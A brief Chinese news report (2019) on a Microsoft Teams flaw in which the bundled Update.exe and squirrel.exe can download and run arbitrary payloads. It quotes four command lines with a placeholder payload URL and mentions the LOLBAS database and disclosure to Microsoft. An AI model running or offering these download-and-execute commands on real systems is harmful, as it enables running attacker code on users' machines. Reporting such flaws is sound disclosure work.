0
本文作者: 李勤 | 2019-06-30 12:37 |
雷鋒網(wǎng)消息,據(jù) BleepingComputer 美國時間 6 月 29 日報道,多位安全研究人員發(fā)現(xiàn)當(dāng)前在Microsoft Teams桌面應(yīng)用中實現(xiàn)的“update”升級機制允許黑客在系統(tǒng)上下載和執(zhí)行任意文件,
研究人員表示,對易受攻擊的應(yīng)用程序使用“update”命令可以在當(dāng)前用戶的上下文中執(zhí)行任意二進制文件。目前,研究人員已向微軟報告了這個問題。
使用Microsoft Teams,將有效負載添加到其文件夾中,并使用以下任一命令自動執(zhí)行:
Update.exe --update [url to payload]
squirrel.exe --update [url to payload]
這些命令可以與其他參數(shù)一起使用,包括“download”,它允許從遠程位置以NuGet包的形式檢索有效負載。
Update.exe --download [url to payload]
squirrel.exe --download [url to payload]
相同的方法適用于“squirrel.exe”,它也是Microsoft Teams安裝包的一部分。這兩個可執(zhí)行文件現(xiàn)在都是GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)數(shù)據(jù)庫的一部分。
安全研究員 Reegun Richard 在 6 月 4 日向微軟團隊報告了這個問題。此時,應(yīng)用程序仍然容易受到攻擊,因為微軟通知研究員該修復(fù)程序?qū)⒃谖磥淼能浖姹局谐霈F(xiàn)。
來源:BleepingComputer 。
雷峰網(wǎng)版權(quán)文章,未經(jīng)授權(quán)禁止轉(zhuǎn)載。詳情見轉(zhuǎn)載須知。